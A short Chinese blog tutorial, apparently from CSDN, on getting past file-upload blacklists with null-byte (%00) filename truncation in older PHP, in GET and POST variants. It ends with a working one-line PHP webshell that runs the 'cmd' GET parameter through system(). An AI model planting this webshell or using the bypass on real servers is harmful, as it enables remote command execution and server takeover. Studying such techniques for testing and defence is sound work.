文件上传-绕过白名单验证

本文探讨了00截断原理,它如何影响文件名读取,特别是在PHP5.3之前的版本中。提到0x00字符在某些函数中作为结束符,可能导致安全问题。同时,讲解了GET型和POST型00截断的差异,并强调了在绕过黑名单验证中的应用。最后,提到了利用此漏洞执行webshell的一句话代码。
摘要由CSDN通过智能技术生成

绕过黑名单验证(00截断绕过)

00截断原理
0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。
在PHP5.3之后的版本中完全修复了00截断。并且00截断受限于GPC,addslashes函数。
GET型00截断
GET型提交的内容会被自动进行URL解码。
注意:一定要关闭GPC,否则无法成功。
在这里插入图片描述
在这里插入图片描述
POST型00截断
在POST请求中,%00不会被自动解码,需要在16进制中进行修改00
在这里插入图片描述
一句话代码执行webshell
使用php中的函数system执行GET提交的参数。

<?php
	if($_GET){
		$cmd = $_GET["cmd"];
		system($cmd);
	}else{
		echo "no cmd";
	}
?>

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值